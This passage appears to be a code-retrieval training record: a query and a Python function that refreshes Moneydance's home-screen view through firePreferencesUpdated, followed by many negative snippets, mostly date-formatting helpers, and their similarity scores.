\"09/30/13\"],\n [\"%X\", \"Locale's appropriate time representation.\", \"07:06:05\"],\n [\"%%\", \"A literal '%' character.\", \"%\"]\n ]\n\n display(HTML(\n '<table><tr>{}</tr></table>'.format(\n '</tr><tr>'.join(\n '<td>{}</td>'.format('</td><td>'.join(str(_) for _ in row)) for row in data)\n )\n ))", "def getdate():\n return strftime(\"%A %B %d, %I:%M %p\")", "def date_pattern():\n\n from datetime import datetime\n\n # Current time\n now = datetime.now()\n # Getting date\n date_val = now.strftime('%d_%b_%Y')\n # Getting hour:min:sec\n hour_val = now.strftime('%H%M%S')\n # Getting microsecond\n micro_val = now.strftime('%f')[:2]\n\n # Returns a str in described format\n return f'{date_val}_{hour_val}{micro_val}'", "def time_hack(self):\n now = datetime.datetime.now()\n monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun',\n 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']\n month = monthnames[now.month - 1].capitalize()\n return ('[%02d/%s/%04d:%02d:%02d:%02d.%06d]' %\n (now.day, month, now.year, now.hour, now.minute, now.second, now.microsecond))", "def getTimeString():\n\tfrom time import strftime\n\treturn strftime(\"%d-%m-%Y__%H-%M-%S\")", "def gmdate(format, stamp = None):\n if stamp is None:\n stamp = time.time()\n dt = datetime.datetime.utcfromtimestamp(stamp)\n return dt.strftime(format)", "def strftime(self, fmt):\n # The year must be >= 1000 else Python's strftime implementation\n # can raise a bogus exception.\n timetuple = (1900, 1, 1, self._hour, self._minute, self._second, 0, 1, -1)\n return _wrap_strftime(self, fmt, timetuple)", "def date_string_to_strftime_format(date_string):\n for data in STRF_DATA:\n for pattern in data.get('patterns', []):\n if pattern in date_string:\n date_string = date_string.replace(pattern, data['replacement'])\n break\n else:\n if data.get('regex'):\n date_string = re.sub(data['regex'], data['replacement'], date_string)\n # matches = find()\n # if any(matches):\n # date_string = date_string.replace(matches[0], data['replacement'])\n\n return date_string", "def ingame_formatted(dt: datetime) -> str:\n return dt.strftime(\"%Y - %B\")", "def dtstr():\n return dt.strftime(dt.now(),'%Y %m %d, %H:%M:%S')", "def get_time_str():\n return time.strftime(time_fmt)", "def format_date(self, data):\n return '%s/%s' % (data.month, data.day)", "def l10n_format_date(ctx, date, format='long'):\n lang = get_locale(ctx['LANG'])\n if date:\n return format_date(date, locale=lang, format=format)\n else:\n return ''", "def reformat_date(mdy_date_string):\n date = mdy_date_string.split('/')\n return f\"{date[2]}-{date[0]}-{date[1]}\" # difficult to read", "def dateFormat(Epoch):\n import time, math\n timeTup = time.localtime(Epoch)\n if time.localtime().tm_year != timeTup.tm_year:\n return time.strftime('%b %d %Y ', timeTup)\n return time.strftime('%b %d %H:%S ', timeTup)", "def readable_date(self, date, format='%H:%M on %-d %B'):\n return date.strftime(format)", "def date2str(date, date_format):\n return date.strftime(date_format)", "def strftime(self, # pylint: disable=invalid-name\n fmt, roundofs=500, fixed_leap=None):\n struct_key = (roundofs, fixed_leap)\n struct = self._struct_dict.get(struct_key)\n if not struct:\n secofs, micros = divmod((self.nanosecond + roundofs) // 1000, 1000000)\n if fixed_leap is not None:\n raise ValueError('No fixed_leap on time-only object')\n if secofs:\n hour, minute, second = SecondsToHMS(self.seconds + secofs,\n leapok=False)\n struct0 = (0, 0, 0, hour % 24, minute, second, 0, 0, 0)\n else:\n struct0 = (0, 0, 0, self.hour, self.minute, self.second, 0, 0, 0)\n struct = (struct0, '%.06d' % micros)\n self._struct_dict[struct_key] = struct\n return LocalStrftime(fmt, struct[0], struct[1])", "def txfDate(date):\n return date.strftime('%m/%d/%Y')", "def date_format(date_str):\r\n return date_str.replace(\"/\", \"_\")", "def get_time_stamp_str() -> str:\n return datetime.datetime.now().strftime(DateFormat)", "def render_date(dt):\n return dt.strftime('%Y-%m-%d')", "def date2text(date=None):\n return date.strftime('%-d %B %Y')", "def date_format(context):\n return {'DATE_FORMAT': settings.DATE_FORMAT.replace('%', '')}", "def reformat_date(mdy_date_string):\n month, day, year = mdy_date_string.split('/')\n return f\"{year}-{month}-{day}\"", "def _strftime(cls, timestamp: typing.Optional[datetime.datetime]) -> typing.Optional[str]:\n if not timestamp:\n return None\n return timestamp.strftime(cls._TSFMT)", "def format_date(date):\n if type(date) is datetime.date:\n format_str = '%d.%m.%Y r.'\n else:\n format_str = '%H:%M %d.%m.%Y'\n\n date_str = '{:{fs}}'.format(date, fs=format_str)\n\n return date_str", "def do_date(dt, format='%Y-%m-%d - %A'):\n if dt is None:\n return ''\n # Only difference with do_datetime is the default format, but that is\n # convenient enough to warrant its own template filter.\n return dt.strftime(format)", "def get_datetime_string():\n return datetime.now().strftime(DATETIME_FORMAT)", "def displayText(self, value, locale):\n try:\n if QT_VERSION_STR[0] == '4':\n date = value.toPyObject() # QVariant ==> datetime\n elif QT_VERSION_STR[0] == '5':\n date = value\n return date.strftime(self.format)\n except:\n return \"\"", "def datetime_to_str(date, date_format=FORMAT_DATE):\n return date.strftime(date_format)", "def get_date(fmt=\"%Y-%m-%d\"):\n now = datetime.datetime.now().replace(tzinfo=IST)\n\n return now.strftime(fmt)", "def to_filetag(self) -> str:\n return self.strftime(f\"{self.FormatCode.YEAR.WITH_CENTURY}{self.FormatCode.MONTH.NUM}{self.FormatCode.DAY.NUM}\")", "def percent_update_date(self):\n d = self.percent_update_time.day\n return self.percent_update_time.strftime(\"%A %d{S}\").replace('{S}', str(d) + 'th' if 11 <= d <= 13 else {1:'st', 2:'nd', 3:'rd'}.get(d % 10, 'th'))", "def format_date(dt):\n # Looks like:\n # Sat, 07 Sep 2002 00:00:01 GMT\n # Can't use strftime because that's locale dependent\n #\n # Isn't there a standard way to do this for Python? The\n # rfc822 and email.Utils modules assume a timestamp. The\n # following is based on the rfc822 module.\n return \"%s, %02d %s %04d %02d:%02d:%02d GMT\" % (\n [\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", \"Sat\", \"Sun\"][dt.weekday()],\n dt.day,\n [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\",\n \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"][dt.month-1],\n dt.year, dt.hour, dt.minute, dt.second)", "def test_strftimeEx_07():\n t = 7.9996\n fmt = \"%S %(ms_)\"\n result = strftimeEx(fmt, t)\n expected = \"07 999\"\n print 'result = \"%s\" expected = \"%s\"' % (result, expected)\n assert result == expected", "def shortDate(self, date):\n return u'%s %02i' % (date.pMonth(), date.day())", "def __str__(self):\n return '{y}-{m:0>2}-{d:0>2}'.format(y=self.year, m=self.month, d=self.day)", "def date_format(self):\n return self._date_format", "def get_date_display(self, context):\n return '{year}/{month}/{day}'.format(\n year=self.get_year(),\n month=self.get_month().zfill(2),\n day=self.get_day().zfill(2))", "def strftimeEx(fmt, t, timetuple=None):\n if callable(fmt):\n return fmt(t)\n\n if \"%(ms)\" in fmt:\n # Assume that fmt does not also contain %(ms_) and %(us).\n # (It really doesn't make sense to mix %(ms) with those.)\n secs, frac = divmod(round(t,3), 1)\n ms = int(round(1e3*frac))\n fmt = fmt.replace(\"%(ms)\", \"%03d\" % ms)\n else:\n # Assume fmt contains %(ms_) and %(us).\n secs, frac = divmod(round(t,6), 1)\n ms = int(round(1e3*frac))\n ms_, us = divmod(int(round(1e6*frac)),1000)\n fmt = fmt.replace(\"%(ms_)\", \"%03d\" % ms_)\n fmt = fmt.replace(\"%(us)\", \"%03d\" % us)\n\n if not timetuple:\n timetuple = localtime(secs)\n\n return strftime(fmt, timetuple)", "def strftime(self, format):\n x = _calcDependentSecond2(self._year, self._month, self._day,\n self._hour, self._minute, self._second)\n ltz = self._calcTimezoneName(x, 0)\n tzdiff = _tzoffset(ltz, self._t) - _tzoffset(self._tz, self._t)\n zself = self + tzdiff / 86400.0\n microseconds = int((zself._second - zself._nearsec) * 1000000)\n unicode_format = False\n if isinstance(format, explicit_unicode_type):\n format = format.encode('utf-8')\n unicode_format = True\n ds = datetime(zself._year, zself._month, zself._day, zself._hour,\n zself._minute, int(zself._nearsec),\n microseconds).strftime(format)\n if unicode_format:\n return ds.decode('utf-8')\n return ds", "def date(value: datetime.date): # noqa\n month_full_name = '%B'\n year_full = '%Y'\n\n is_unix_like = sys.platform in ('linux', 'linux2', 'darwin')\n day_without_leading_zero = '%-d' if is_unix_like else '%#d'\n hours_without_leading_zero = '%-I' if is_unix_like else '%#I'\n\n minutes_00_59 = '%M'\n am_or_pm = '%p'\n\n return have.value(\n value.strftime(\n f'{month_full_name} '\n f'{day_without_leading_zero}, '\n f'{year_full} '\n f'{hours_without_leading_zero}:'\n f'{minutes_00_59} '\n f'{am_or_pm}'\n )\n )", "def get_date_format_string(period):\n # handle the special case of 'month' which doesn't have\n # a static interval in seconds\n if isinstance(period, str) and period.lower() == 'month':\n return '%Y-%m'\n file_period_secs = get_period_seconds(period)\n format_pieces = ('%Y', '-%m-%d', ' %H', '-%M', '-%S')\n seconds_per_second = 1\n intervals = (\n seconds_per_year,\n seconds_per_day,\n seconds_per_hour,\n seconds_per_minute,\n seconds_per_second,\n )\n mods = list(map(lambda interval: file_period_secs % interval, intervals))\n format_pieces = format_pieces[: mods.index(0) + 1]\n return ''.join(format_pieces)", "def _format_date(self, date, humanize=True):\n if date:\n if humanize and date in self.special_dates:\n rv = self.special_dates[date]\n else:\n rv = date.strftime(self.date_format)\n return rv\n else:\n return ''", "def format_date(self, date):\n return date.strftime('%Y-%m-%d')", "def adjust_date_format(date, format_in, format_out):\n return datetime.strptime(date, format_in).strftime(format_out)", "def format_date(date, date_format_override=None):\n\n global date_format\n\n return datetime.datetime.strptime(date, '%Y-%m-%d').strftime(date_format_override or date_format)", "def today_string(fmt='%Y-%m-%d'):\n return brasilia_time().strftime(fmt)", "def time(self):\r\n now = datetime.datetime.now()\r\n month = rfc822._monthnames[now.month - 1].capitalize()\r\n return ('[%02d/%s/%04d:%02d:%02d:%02d]' %\r\n (now.day, month, now.year, now.hour, now.minute, now.second))", "def _reformat_to_readable_date(self, d: datetime.datetime) -> str:\n return re.fullmatch(\"(.*) \\d+:.*\", d.ctime()).group(1)", "def strftime(self, date_format: str) -> Index:\n return Index(self.to_series().dt.strftime(date_format))", "def get_date_to_display(self) -> str:\n if not self.settings.show_date_to:\n return \"\"\n return _date(\n self.date_to,\n \"DATETIME_FORMAT\" if self.settings.show_times else \"DATE_FORMAT\"\n )", "def get_date(self):\n return self.date.strftime(\"%a %x\")", "def get_date_display(self, context):\n return '{year}/{month}'.format(year=self.get_year(),\n month=self.get_month().zfill(2))", "def strftime(self, fmt=FMT_ISO8601, roundofs=500, fixed_leap=None):\n struct_key = (roundofs, fixed_leap)\n struct = self._struct_dict.get(struct_key)\n if not struct:\n strloc = self\n secofs, nanos = divmod(self.nanosecond + roundofs, 1000000000)\n if fixed_leap is not None:\n secofs += self.leapseconds - fixed_leap\n if secofs:\n days, secs = self.tai_day_secs()\n dayofs, secs = divmod(secs + secofs, SECONDS_PER_DAY)\n strloc = datetime.from_tai_day_secs(days + dayofs, secs, nanos)\n # pylint: disable=protected-access\n yday = strloc._days - DayNum(strloc.year, 1, 1) + 1\n wday = _DayNumToWeekdayNum(strloc._days)\n struct = ((strloc.year, strloc.month, strloc.day,\n strloc.hour, strloc.minute, strloc.second, wday, yday, 0),\n '%.06d' % (nanos // 1000))\n self._struct_dict[struct_key] = struct\n return LocalStrftime(fmt, struct[0], struct[1])", "def formatCurrTime(fmt=\"%H:%M:%S\"):\n assert fmt is not None, \"The format is None\"\n return strftime(fmt)", "def format_date(time=False):\n\n return arrow.get(time).format('DD-MM-YYYY')", "def date_string(date):\n day = date.day\n month = date.month\n year = date.year\n formatted_string = str(month) + \"/\"\n formatted_string += str(day) + \"/\"\n formatted_string += str(year)\n return formatted_string", "def timestamp(formatting=\"%Y%m%d_%H%M%S\"):\n now = datetime.now()\n return now.strftime(formatting)", "def get_date_from_display(self) -> str:\n return _date(\n self.date_from,\n \"DATETIME_FORMAT\" if self.settings.show_times else \"DATE_FORMAT\"\n )", "def period_str(month_tuple, fmt='%Y/%m'):\n return datetime.date(*month_tuple).strftime(fmt)", "def __format__(self, fmt):\n if not isinstance(fmt, str):\n raise TypeError(\"must be str, not %s\" % type(fmt).__name__)\n if len(fmt) != 0:\n return self.strftime(fmt)\n return str(self)", "def format_weekday_month_day(time):\n return (format_weekday(time) + \" \" + \n format_month_day(time))", "def friendly_date(self):\n return self.created_at.strftime(\"%a %b %#d %Y, %#I:%M %p\")", "def formatTime(self, record, datefmt=None):\n ct = self.converter(record.created)\n _format = datefmt or self.default_time_format\n\n s = ct.strftime(_format)\n\n return s", "def now():\n return datetime.now().strftime(FORMAT)", "def fCommon(self):\n return '%s %s, %4.4d %s:%2.2d %s' % (\n self._fmon, self._day, self._year, self._pmhour,\n self._minute, self._pm)", "def format_date(self, date_val):\n try:\n if type(date_val) is not datetime:\n d = date.fromisoformat(date_val[0:10])\n else:\n d = date_val\n return d.strftime('%Y-%m-%d')\n except Exception as e:\n self.error((str(e)))", "def pretty_date(self, date):\r\n return time.strftime(\"%a, %b %d, %Y\", time.strptime(date,\"%Y%m%d\"))", "def strftime_to_unicode(self, fmt):\r\n return re.sub(\r\n r'(%[a-zA-Z])',\r\n lambda m: self.STRFTIME_TO_UNICODE.get(m.group(1), m.group(1)),\r\n fmt\r\n )", "def format_message(self, message):\n return \"%s at %s\" % (\n message[0], time.asctime(time.localtime(message[1])))" ]
[ "0.76526", "0.76526", "0.76526", "0.7622349", "0.74858314", "0.7395106", "0.7327035", "0.7324193", "0.7300734", "0.71893567", "0.7129464", "0.7052781", "0.7028228", "0.7019862", "0.70110154", "0.693482", "0.692643", "0.683672", "0.6810442", "0.6744643", "0.67248136", "0.66804725", "0.66776884", "0.6652715", "0.6599797", "0.655845", "0.6514059", "0.6463454", "0.6462032", "0.6457314", "0.6451415", "0.6427054", "0.6410915", "0.6402916", "0.63635296", "0.6347897", "0.6347218", "0.634703", "0.63355833", "0.63185924", "0.6312423", "0.62894845", "0.626449", "0.62627035", "0.6256297", "0.6249736", "0.62350124", "0.6228438", "0.6187894", "0.6185798", "0.61786896", "0.61765194", "0.6155098", "0.6154655", "0.6154589", "0.6154357", "0.6141057", "0.6140959", "0.61234254", "0.6116804", "0.6085865", "0.60772455", "0.6071159", "0.6067415", "0.60633045", "0.6058273", "0.60388756", "0.6038718", "0.60337716", "0.6026521", "0.60211813", "0.6018606", "0.60177964", "0.6016741", "0.6006263", "0.5994856", "0.59924054", "0.59853315", "0.59802395", "0.597841", "0.5945185", "0.59317285", "0.59277886", "0.5923738", "0.5921928", "0.5921099", "0.5917943", "0.5916698", "0.5901901", "0.5898542", "0.587629", "0.5867214", "0.5866662", "0.5845109", "0.58283544", "0.5823532", "0.5821896", "0.58190733", "0.58114403", "0.5805651" ]
0.742588
5
This triggers MD to firePreferencesUpdated().... Hopefully refreshing Home Screen Views too
def fireMDPreferencesUpdated(): myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()" ) class FPSRunnable(Runnable): def __init__(self): pass def run(self): myPrint("DB",".. Inside FPSRunnable() - calling firePreferencesUpdated()...") myPrint("B","Triggering an update to the Summary/Home Page View") MD_REF.getPreferences().firePreferencesUpdated() if not SwingUtilities.isEventDispatchThread(): myPrint("DB",".. Not running within the EDT so calling via FPSRunnable()...") SwingUtilities.invokeLater(FPSRunnable()) else: myPrint("DB",".. Already running within the EDT so calling FPSRunnable() naked...") FPSRunnable().run() return
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def refresh_screen(self):", "def preferencesChanged(self):\n # do nothing\n pass", "def on_refresh(self):\n pass", "def updateSettingsUI(self):\n\n pass", "def applyPrefs (self):\r\n self.storyPanel.eachWidget(lambda w: w.applyPrefs())\r\n self.storyPanel.Refresh()", "def on_pre_enter(self):\n Logger.info('Application: Changed to the Settings screen.')", "def onPreferences():\n dialog = prefDialog()\n dialog.show()", "def onSettings(self):\n pass", "def preferencesChanged(self):\n self.__logViewer.preferencesChanged()", "def refresh(self) -> None:\n self.screen.refresh()", "def onUpdated(self):", "def Refresh(self):\n pass", "def refresh_view():\n pass", "def _on_pref_decls_updated(self, change):\n self._refresh_pref_decls()", "def _refresh(self):\n self._need_display_update = True\n self._update()", "def _refresh_screen(self):\n self.myscreen.refresh()\n self.box1.refresh()\n self.box2.refresh()", "def refresh_plugin(self):\n pass", "def refresh(self):\n pass", "def refresh(self):\n pass", "def refresh(self, view_manager):\n pass", "def preferencesChanged(self):\n # reload the APIs\n self.apisManager.reloadAPIs()\n \n # reload editor settings\n for editor in self.editors:\n zoom = editor.getZoom()\n editor.readSettings()\n editor.zoomTo(zoom)\n \n # reload the autosave timer setting\n self.autosaveInterval = Preferences.getEditor(\"AutosaveInterval\")\n if len(self.editors):\n if (\n self.autosaveTimer.isActive() and\n self.autosaveInterval == 0\n ):\n self.autosaveTimer.stop()\n elif (\n not self.autosaveTimer.isActive() and\n self.autosaveInterval > 0\n ):\n self.autosaveTimer.start(self.autosaveInterval * 60000)\n \n self.__enableSpellingActions()", "def onPreferences():\n cpp.createWidgets()\n dialog = cpp.dialog()\n dialog.show()", "def on_settings(self):\n\n # Pull the current app state from the relay Observer object\n status, interval, ntfc_status, ntfc_state = settings_state.get_state()\n\n # Pass it to the Observable object in order to render the Settings window\n settings_changed, update_interval, ntfc_changed, ntfc_selected = render_settings_window(\n status, interval, ntfc_status, ntfc_state, settings_state)\n\n # Register any state changes\n settings_state.update_state(settings_changed, update_interval, ntfc_changed, ntfc_selected)\n\n # If the interval has changed, reprogram scheduler to run at the new interval\n if settings_state.intrvl_change_trig:\n modify_scheduler(JOB_ID, settings_state.settings_interval)\n\n if settings_state.notification_change_trig:\n NewsIndicator.notifications = False if not settings_state.notification_state else True", "def refresh(self) -> None:\n pass", "def refresh(self) -> None:\n pass", "def refresh(self) -> None:\n pass", "def _refresh(self):\n # if we have all the values we need to hookup to the URL\n for key in self.DBMSettings.keys():\n if not key.startswith(LOCALCHAR):\n self.DBMSettings[key] = self._urldict()[key]", "def update_ui(self):\n # main data\n self.lAcc.setText(self.settings.ACCOUNT)\n # self.lExcessLiquidity.setText(str(self.ibkrworker.app.excessLiquidity))\n # self.lSma.setText(str(self.ibkrworker.app.sMa))\n if hasattr(self.ibkrworker.app, 'smaWithSafety'):\n self.lSma.setText(str(round(self.ibkrworker.app.smaWithSafety, 1)))\n else:\n self.lSma.setText(str(round(self.ibkrworker.app.sMa, 1)))\n self.lMarketValue.setText(str(self.ibkrworker.app.netLiquidation))\n self.lblAvailTrades.setText(str(self.ibkrworker.app.tradesRemaining))\n self.lcdPNL.display(self.ibkrworker.app.dailyPnl)\n if self.ibkrworker.app.dailyPnl > 0:\n palette = self.lcdPNL.palette()\n palette.setColor(palette.WindowText, QtGui.QColor(51, 153, 51))\n self.lcdPNL.setPalette(palette)\n elif self.ibkrworker.app.dailyPnl < 0:\n palette = self.lcdPNL.palette()\n palette.setColor(palette.WindowText, QtGui.QColor(255, 0, 0))\n self.lcdPNL.setPalette(palette)\n\n total_positions_value = 0\n for p in self.ibkrworker.app.openPositions.values():\n if hasattr(p, 'Value'):\n total_positions_value += p[\"Value\"]\n self.lPositionsTotalValue.setText(str(round(total_positions_value, 1)))\n\n self.update_open_positions()\n self.update_live_candidates()\n self.update_open_orders()\n\n # everything disabled for safety - is now enabled\n self.chbxProcess.setEnabled(True)\n self.btnSettings.setEnabled(True)\n\n self.update_session_state()\n\n if not self.uiTimer.isActive():\n self.update_console(\"UI resumed.\")\n self.uiTimer.start(int(self.settings.INTERVALUI) * 1000) # reset the ui timer", "def _breakpoints_changed(self):\n if not self.view:\n return\n\n if self._ignore_signals:\n return\n\n self.view.refresh()", "def update_current_screen(self):\n\t\tself.current_screen.update()", "def on_window_ready(self):\n pass", "def on_show_view(self):\n self.setup()", "def on_show_view(self):\n self.setup()", "def on_show_view(self):\n self.setup()", "def on_load(self):", "def refresh(self) -> None:\n self.data = {}\n self.load_settings_file(self.default_settings_path / \"settings.yaml\", file_key=\"internal\")\n self.load_systems(self.default_settings_path / \"systems\")\n self.load_settings_file(self.personal_dir / \"settings.yaml\", file_key=\"user\")\n self.load_systems(self.personal_dir / \"systems\")", "def updateTheme(self):\n self.myUpdate(stateDict=None)", "def update_controller(self):", "def on_preference(self, widget, data=None):\n print \"This feature will be implemented soon\"", "def __configure(self):\n e5App().getObject(\"UserInterface\").showPreferences(\"logViewerPage\")", "def refresh(self):\n self.Refresh()", "def reload_state(self):\n if len(s.item) > 0:\n for item in s.item:\n self.items_list.insert(\n \"\", \"end\", values=(item.get(\"item\"), item.get(\"url\"), \" \")\n )\n # Update with saved settings\n # Update the refresh interval\n if s.setting != \"\":\n self.interval_entry.delete(0, \"end\")\n self.interval_entry.insert(0, s.setting)\n if s.LaunchAtStartup == \"True\":\n self.launch_at_start_up.select()\n else:\n self.launch_at_start_up.deselect()\n if s.Minimize == \"True\":\n self.minimize_to_system_tray.select()\n else:\n self.minimize_to_system_tray.deselect()\n # If the email alert is included in the state file\n if \"Email\" in s.alert:\n self.email_alert_box.select()\n # Display the email address\n emaddress = s.email\n self.email_addr_entry.insert(0, emaddress)", "def reload(self):", "def reload(self):", "def home_callback(self):\n self.rokucontrol.home_callback()", "def reloadMode(self): \n\t\tpass", "def __window_home(self):\n pass", "def refresh(self):\n\n self._refreshed_on = time.time() * 1000", "def refresh_view(self):\n # self.view_model.query_str = \"\"\n self.query_header.content.text = query_title_bar_text(self.shared_state)\n # self.view_model.update_results()\n self.layout.focus(self.query_window)", "def _Refresh(self):\n raise NotImplementedError", "def refresh(self):\n self.getWindow().getDecorView().postInvalidate()", "def update(self):\n self.mvp = self.computeMVP()\n self.onPropertyChanged()", "def _refresh(self):\n self._value = (self._service.get_value(self._entry_point, self._path)=='true')", "def _update_home_information(self, homes):\n\n if homes is not None and len(homes) > 0:\n self._home = homes[0]\n self.has_home = True\n self._update_horizon(max(abs(self._home[0]), abs(self._home[1])))\n if self.experimental_home is None:\n self.experimental_home = self._home\n else:\n if self.experimental_home not in self.last_scan['Home']:\n print self, self.experimental_home, \"is not in\", self.last_scan['Home']\n self.experimental_home = self._home\n else:\n self._home = self.experimental_home # Try some reckoning\n\n return", "def _update_callback(self) -> None:\n self.async_schedule_update_ha_state(force_refresh=True)", "def _update_callback(self) -> None:\n self.async_schedule_update_ha_state(force_refresh=True)", "def on_preferences(self, evt):\n # Passing `self` sets the main window as the parent window\n self.prefs.Show(self)\n evt.Skip()", "def preferences(self: Self, event: Event = None) -> None:\n c = self\n c.openLeoSettings()", "def refresh(self):\n self.__refresh()", "def on_startup(self) -> None:\n ...", "def update_presence(self):\n\t\tif self.config.presence_model == 'permanent':\n\t\t\tself.thin.presence = 'true'", "def beforeUpdate(self):", "def liveview(self):\n if self.liveviewButton.isChecked():\n# self.save = False\n self.paramChangedInitialize()\n self.openShutter(\"red\")\n self.liveviewStart()\n\n else:\n self.liveviewStop()", "def handle_reload_toolbox(self):", "def __load_value_prop_from_welcome(self):\n self.fc.reset_app()\n self.driver.wdvr.start_activity(self.pkg_name, LAUNCH_ACTIVITY.SMART)\n self.driver.wait_for_context(WEBVIEW_CONTEXT.SMART, timeout=20)\n self.web_welcome.verify_welcome_screen()\n self.web_welcome.click_accept_all_btn()\n self.driver.switch_to_webview(webview_name='NATIVE_APP')\n self.driver.wait_for_context(WEBVIEW_CONTEXT.SMART, timeout=20)\n # Currently HPID take 10-20s to load to value prop screen.\n self.value_prop.verify_ows_value_prop_screen()", "def update_callback(self):\n self.schedule_update_ha_state(True)", "def update_callback(self):\n self.schedule_update_ha_state(True)", "def update_has_data(self):\n self.main()", "def refresh_screen(self):\n stdscr = self.stdscr\n stdscr.refresh()", "def handleReload(self, confInfo=None):", "def consumer_refresh(self):\r\n if not self.perms_mask & DPROP_PERM_REFRESH:\r\n raise DevicePropertyPermError, \"refresh permission denied\"\r\n\r\n self.device_refresh_cb()", "def trigger_refresh(self):\n self.get_selected()\n self.manage_loading(loading=True)\n self.current_feed.fetch_content(unread_only=self.show_unread_only)\n self.manage_actions()", "def on_preview_refresh_activate(self,widget,data=None):\n self.app._update_preview()", "def syncrepl_refreshdone(self):\n pass", "def refresh(self):\n self.fetch(False)", "def after_update(self, *args):\n raise NotImplementedError", "def _update(self):\n pass", "def _resolution_changed(self):\n self.reinitialiseData()", "def _update_view(self):\n NavigationToolbar2._update_view(self)\n\n self._myParent.evt_view_updated()\n\n return", "def reload(self):\n\n pass", "async def async_update(self):\n _LOGGER.debug(\n \"SynoDSMSurveillanceHomeModeToggle.async_update(%s)\",\n self._api.information.serial,\n )\n self._state = await self.hass.async_add_executor_job(\n self._api.surveillance_station.get_home_mode_status\n )", "async def notify_view(self):\n await self.game_view.notify()", "def on_load(self):\n pass", "def on_load(self):\n pass", "def _update_callback(self) -> None:\n self.metoffice_site_id = self._data.site_id\n self.metoffice_site_name = self._data.site_name\n self.metoffice_now = self._data.now\n self.async_write_ha_state()", "def update(self):\r\n pass", "def reload_info(self):\n self.__loop.run_until_complete(self.__reload_info())", "def on_first_registration(self):\n self.main.tabify_plugins(self.main.help, self)\n self.dockwidget.hide()", "def onOpen(self):", "def on_action_set_view(self, content):\n self._view = content['view']\n self.refresh_traits_widget()", "def update(self):", "def update(self):", "def update(self):", "def _refreshActionTriggeredSlot(self):\r\n \r\n self._controller.model.refresh(self._controller.model.activeIndex)", "def updateDisplay(self):\n if self._displayPjt:\n self._displayPjt.updateim()\n if self._displayUsr:\n self._displayUsr.updateim()\n if self._displayVtk:\n self._displayVtk.updateim()", "def reset(self):\n self.home()", "def settings_updated(self):\n super(ItemListView, self).settings_updated()\n show_mode = str(settings.get('items', 'show_mode'))\n self.unread_only_default = show_mode.find('unread') != -1\n self.show_mode_save = show_mode.find('nosave') == -1", "def conf_update(self):\n pass", "def updateWidget(self):\n pass", "def _refresh_pref_decls(self):\n workbench = self.workbench\n point = workbench.get_extension_point(PREFS_POINT)\n extensions = point.extensions\n\n # If no extension remain clear everything\n if not extensions:\n self._pref_decls.clear()\n return\n\n # Map extension to preference declaration\n new_ids = dict()\n old_ids = self._pref_decls\n for extension in extensions:\n if extension.plugin_id in old_ids:\n pref = old_ids[extension.plugin_id]\n else:\n pref = self._load_pref_decl(extension)\n new_ids[extension.plugin_id] = pref\n\n self._pref_decls = new_ids" ]
[ "0.70166314", "0.67420226", "0.67126137", "0.6558181", "0.6547368", "0.6456297", "0.62285334", "0.61892396", "0.6178164", "0.6083877", "0.59968984", "0.59863025", "0.5978254", "0.5940049", "0.5935096", "0.5920283", "0.59084743", "0.58467805", "0.58467805", "0.58374125", "0.58041275", "0.5804079", "0.5803662", "0.5737976", "0.5737976", "0.5737976", "0.5722338", "0.56882226", "0.56865776", "0.5680478", "0.56715494", "0.56665576", "0.56665576", "0.56665576", "0.5636496", "0.5632486", "0.5630555", "0.5612787", "0.561155", "0.5609844", "0.56086046", "0.5603272", "0.5600497", "0.5600497", "0.55969214", "0.5571575", "0.5544049", "0.5538212", "0.55276865", "0.5527598", "0.55142283", "0.5503982", "0.5484367", "0.5481851", "0.5476838", "0.5476838", "0.5473031", "0.5460443", "0.54599285", "0.54582673", "0.5452427", "0.5437691", "0.54361516", "0.5435025", "0.5428268", "0.54236263", "0.54236263", "0.5408327", "0.5405012", "0.54006875", "0.539996", "0.53996265", "0.53929496", "0.5374104", "0.5363752", "0.53609294", "0.53431344", "0.5342264", "0.5340438", "0.53381544", "0.5326383", "0.5325952", "0.53224695", "0.53224695", "0.5315746", "0.5310002", "0.5302442", "0.5301524", "0.5290214", "0.5287473", "0.528597", "0.528597", "0.528597", "0.5284254", "0.5276375", "0.5276236", "0.527554", "0.5271364", "0.52664894", "0.52642846" ]
0.7383542
0
Searches Moneydance for a specific extension loaded
def find_feature_module(theModule): # type: (str) -> bool fms = MD_REF.getLoadedModules() for fm in fms: if fm.getIDStr().lower() == theModule: myPrint("DB", "Found extension: %s" %(theModule)) return fm return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_loaded_extensions():\n raise NotImplementedError()", "def load_extensions(self):\n extension_module_name = f\"{utils.get_project_name()}.cogs\"\n for extension in CONF.LOADED_EXTENSIONS:\n try:\n self.load_extension(extension_module_name + \".\" + extension)\n LOG.debug(f\"The extension '{extension.split('.')[0]}' has been successfully loaded\")\n except Exception as e:\n message = f\"Failed to load extension '{extension.split('.')[0]}'\"\n LOG.exception(log.get_log_exception_message(message, e))", "def find(self):\n extension_hooks = list()\n #Find all extension names\n dirs = pylabs.q.system.fs.listDirsInDir(self.rootDir, True,findDirectorySymlinks=True)\n # Use a simple PMExtensionFactory\n factory = PMExtensionFactory()\n for dir in (d for d in dirs if pylabs.q.system.fs.exists(os.path.join(d, self.extensionConfigName))):\n #we found possible extension because extension.cfg file found\n pylabs.q.logger.log('Found extension in %s' % dir, 6)\n # Load extension ini file\n configfilePath = os.path.join(dir, self.extensionConfigName)\n inifile = pylabs.inifile.IniFile(configfilePath)\n path = pylabs.q.system.fs.getDirName(configfilePath)\n hooks = self._getHookInformation(inifile, path, factory)\n extension_hooks.extend(hooks)\n return extension_hooks", "def find_extension(self, name):\n return unpack([extension for extension in self.extensions\n if extension.name == name], singleton=True)", "def extensions():\n\n pass", "async def load(ctx, cog):\n\tos.chdir(os.path.dirname(os.path.realpath(__file__)))\n\tif path.exists(\"cogs/\"+cog+\".py\"):\n\t\tprelen = len(bot.commands)\n\t\t\n\t\tbot.load_extension('cogs.'+cog)\n\n\t\t#checking if the extension loaded\n\t\tif len(bot.commands) > prelen:\n\t\t\tawait ctx.send('Loaded extension.')\n\t\telse:\n\t\t\tawait ctx.send('Failed to load 